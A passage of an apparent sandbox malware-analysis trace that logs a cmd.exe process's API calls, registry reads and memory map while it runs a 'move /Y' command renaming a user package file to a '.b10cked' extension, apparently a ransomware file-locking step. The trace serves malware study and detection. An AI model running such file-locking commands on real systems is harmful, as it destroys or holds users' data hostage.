\"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon 
Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30286 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30287 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30288 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30289 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 30290 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30291 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30292 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30293 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30294 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30295 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30341 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = 
"" Region: id = 30342 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30343 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30344 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 30345 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 30346 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30347 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30348 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30349 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30350 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30351 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" 
(normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30352 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30353 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30354 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30355 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 30356 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30357 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30358 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30359 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30360 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30361 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30362 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000004f0000" filename = "" Region: id = 30363 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 30364 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 690 os_tid = 0xf78 [0205.442] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa0c | out: lpSystemTimeAsFileTime=0x24fa0c*(dwLowDateTime=0xaf42bc00, dwHighDateTime=0x1d440a9)) [0205.442] GetCurrentProcessId () returned 0x928 [0205.442] GetCurrentThreadId () returned 0xf78 [0205.442] GetTickCount () returned 0x39dd4 [0205.442] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa04 | out: lpPerformanceCount=0x24fa04*=26223126059) returned 1 [0205.443] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.443] __set_app_type (_Type=0x1) [0205.443] __p__fmode () returned 0x76b331f4 [0205.443] __p__commode () returned 0x76b331fc [0205.443] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.443] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.443] GetCurrentThreadId () returned 0xf78 [0205.443] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf78) returned 0x38 [0205.443] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.443] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.444] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f99c | out: 
phkResult=0x24f99c*=0x0) returned 0x2 [0205.444] VirtualQuery (in: lpAddress=0x24f9d3, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.444] GetConsoleOutputCP () returned 0x1b5 [0205.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.444] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.445] _get_osfhandle (_FileHandle=0) returned 0x3 
[0205.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.445] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.445] GetEnvironmentStringsW () returned 0x400190* [0205.445] FreeEnvironmentStringsW (penv=0x400190) returned 1 [0205.445] GetEnvironmentStringsW () returned 0x400190* [0205.446] FreeEnvironmentStringsW (penv=0x400190) returned 1 [0205.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e90c | out: phkResult=0x24e90c*=0x40) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0xb8, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x0, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, 
lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegCloseKey (hKey=0x40) returned 0x0 [0205.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e90c | out: phkResult=0x24e90c*=0x40) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x0, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, 
lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegCloseKey (hKey=0x40) returned 0x0 [0205.446] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.446] srand (_Seed=0x5b8863a7) [0205.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" [0205.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" [0205.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.447] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.447] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.447] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", 
_String2="CMDCMDLINE") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.447] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.447] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.447] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.447] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.447] GetEnvironmentStringsW () returned 0x4022e0* [0205.447] FreeEnvironmentStringsW (penv=0x4022e0) returned 1 [0205.447] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.448] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.448] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.448] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.448] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.448] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.448] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f6d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f6d8, lpFilePart=0x24f6d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f6d4*="Desktop") returned 0x18 [0205.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 
[0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 [0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 [0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.449] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.449] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.449] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.449] GetEnvironmentStringsW () returned 0x402b00* [0205.449] FreeEnvironmentStringsW (penv=0x402b00) returned 1 [0205.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.449] GetConsoleOutputCP () returned 0x1b5 [0205.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.450] GetUserDefaultLCID () returned 0x409 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f818, cchData=128 | out: lpLCData="0") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f818, cchData=128 | out: lpLCData="0") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f818, cchData=128 | out: lpLCData="1") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.451] GetConsoleTitleW (in: lpConsoleTitle=0x3f08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.453] _wcsicmp (_String1="move", _String2=")") returned 68 [0205.453] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0205.453] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0205.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0205.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 
[0205.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0205.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0205.457] GetConsoleTitleW (in: lpConsoleTitle=0x24f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.458] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0205.458] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0205.458] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="CD") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="REN") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0205.458] _wcsicmp (_String1="move", _String2="SET") returned -6 [0205.458] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0205.458] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="MD") returned 11 [0205.458] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0205.458] _wcsicmp (_String1="move", _String2="RD") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0205.458] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0205.458] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0205.459] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0205.459] _wcsicmp (_String1="move", _String2="VER") 
returned -9 [0205.459] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0205.459] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0205.459] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0205.459] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0205.459] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0205.459] _wcsicmp (_String1="move", _String2="START") returned -6 [0205.459] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0205.459] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0205.459] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0205.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.552] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f2cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0205.552] _wcsnicmp 
